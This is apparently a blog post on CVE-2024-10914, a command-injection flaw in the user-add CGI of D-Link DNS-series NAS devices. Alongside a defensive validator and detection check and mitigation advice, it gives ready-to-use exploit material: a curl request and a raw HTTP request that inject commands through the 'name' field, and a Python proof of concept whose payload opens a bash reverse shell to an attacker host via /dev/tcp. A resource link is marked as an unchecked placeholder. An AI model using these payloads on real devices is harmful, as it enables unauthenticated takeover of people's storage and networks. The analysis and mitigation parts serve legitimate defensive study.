A critical security vulnerability, tracked as CVE-2024-10914, has been identified in several D-Link NAS (Network Attached Storage) devices, including DNS-320, DNS-320LW, DNS-325, and DNS-340L, affecting all firmware versions up to 20241028. This vulnerability allows remote attackers to execute arbitrary operating system commands with the privileges of the web server, potentially leading to full device compromise.

This long-form post will break down what the vulnerability is, how it can be exploited, include example code, and guide you to original resources for further study.

- Vulnerable Function: cgi_user_add in /cgi-bin/account_mgr.cgi?cmd=cgi_user_add

- Public Exploit: Yes

- Impact: Full compromise of NAS, unauthenticated code execution, potential pivot to internal networks

- When a new user is added via the web interface, it calls cgi_user_add and processes the name field from the POST request.
- The vulnerability lies in how this script handles input: it doesn’t properly sanitize the value of name before passing it to system commands.

This means an attacker who crafts the right request can smuggle extra shell commands into that value, and the device executes them exactly as if the owner had typed them at a shell on the device.
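To make the root cause concrete, here is an added example that is not from the original post and not the firmware's code: a hardened version of the user-add step that validates the name and never hands it to a shell, plus a request-level check (usable in a reverse proxy or during log review) that flags cgi_user_add requests carrying shell metacharacters in the name field. The adduser argv is a hypothetical stand-in for whatever command the firmware actually runs.

```python
import re
from urllib.parse import unquote_plus

# Strict allowlist for NAS user/group names: a letter, then letters, digits, '_' or '-'.
# Nothing here can act as a shell metacharacter.
USERNAME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9_-]{0,31}$")

# Characters that let a value break out of a shell command string (the bug's root cause).
SHELL_META = set(";|&$`<>()\n\r\"'\\#")


def validate_username(name: str) -> bool:
    """True only if name is safe to pass to an account-management command."""
    return USERNAME_RE.fullmatch(name) is not None


def build_useradd_argv(name: str, group: str) -> list:
    """Hardened equivalent of the vulnerable step: validate first, then build an argv
    list (no shell), so a ';' in the input can never become a second command.
    'adduser -G <group> <name>' is a hypothetical stand-in for the firmware's command."""
    if not validate_username(name) or not validate_username(group):
        raise ValueError("rejected: name/group contains disallowed characters")
    return ["adduser", "-G", group, name]


def form_fields(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body, splitting on '&' only and
    percent-decoding values so an encoded ';' (%3B) is caught as well."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return fields


def flags_cgi_user_add_injection(request_line: str, body: str) -> bool:
    """Defensive check: does a request to cgi_user_add carry shell metacharacters
    in its 'name' field? Returns False for requests to any other endpoint."""
    if "account_mgr.cgi" not in request_line or "cmd=cgi_user_add" not in request_line:
        return False
    for value in form_fields(body).get("name", []):
        if any(ch in SHELL_META for ch in value):
            return True
    return False
```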

Example Exploit

Here’s a simple demonstration using curl to send malicious input. The key is that the name parameter carries a command separator (;) so that a second command piggybacks on the one the device runs.

Exploit Code Snippet

```bash
# Stray ';' after the URL removed so the backslash continuation actually works
curl -k -X POST "http://<device-ip>/cgi-bin/account_mgr.cgi?cmd=cgi_user_add" \
     -d "name=attacker; touch /tmp/hacked; #" \
     -d "passwd=mysecret" \
     -d "group=users"
```

Explanation

- name=attacker; touch /tmp/hacked; # — the injected command (touch /tmp/hacked) will create a file if successful.

The device treats everything after the ; as a system command.

Note: Replace <device-ip> with your device’s IP address.

Python PoC

Here’s a basic Python script to achieve the same, with a reverse shell as payload

```python
import requests

# Target endpoint: replace <device-ip> with the NAS address
TARGET = "http://<device-ip>/cgi-bin/account_mgr.cgi?cmd=cgi_user_add"

# Reverse shell payload (change <attacker-ip> and <port>)
payload = 'eviluser; bash -i >& /dev/tcp/<attacker-ip>/<port> >&1; #'

# Same form fields the web UI sends when adding a user; only 'name' is tampered with
data = {
    'name': payload,
    'passwd': 'foobar',
    'group': 'users'
}

response = requests.post(TARGET, data=data)
print(response.text)
```

Why Is This So Dangerous?

- Remote attack: No need to have an account — if the NAS is exposed to the internet, anyone can exploit it.
- Full device takeover: Since commands run as the web server process (often as root), attackers have complete control.
- Lateral movement: NAS devices are often inside trusted networks, making this a stepping stone for deeper attacks.

Attack Requirements

- Access: The attacker needs network access to the NAS’s web interface. This is often possible on internal networks or badly configured devices exposed to the internet.
- High Complexity: The actual commands must be carefully crafted to bypass minimal input validation and avoid breaking the request structure.
- Authentication: In most setups, no prior authentication is required — making it even more dangerous in default or public deployments.

Example Malicious User Creation Request

```http
POST /cgi-bin/account_mgr.cgi?cmd=cgi_user_add HTTP/1.1
Host: <device-ip>
Content-Type: application/x-www-form-urlencoded
Content-Length: 54

name=admin;id>/tmp/rooted;#&passwd=secret&group=users
```

After sending, if you can see a new file /tmp/rooted containing the device’s UID/GID (id output), you know the exploit succeeded.

Mitigation and Workaround

- Update Firmware: As of now, there may not be a patch for these legacy devices. Confirm on D-Link’s Support Page.
- Restrict Access: Don’t expose the NAS web interface to the internet. Restrict access to trusted hosts and networks.

- Network Segmentation: Place your NAS in a separate VLAN or network zone.

- Monitor system logs: Look for unexpected files or processes. For example, files showing up in /tmp or strange user accounts being created.

Here are some resources for further details:

- MITRE CVE-2024-10914 Entry
- NVD Listing
- Exploit-DB Entry *[Example, adjust to actual if different]*
- D-Link Official Product Support

Closing Thoughts

CVE-2024-10914 is a serious vulnerability that could allow attackers to remotely seize control of popular D-Link DNS NAS devices. Owners and administrators of these devices should remove public access, update firmware if patches appear, and strongly consider retiring unsupported, end-of-life hardware. If your NAS is visible to the public internet, take it down *immediately* until you’ve secured it.

Need help? Leave questions below, and I’ll guide you further!

Timeline

Published on: 11/06/2024 14:15:05 UTC
Last modified on: 11/24/2024 15:15:06 UTC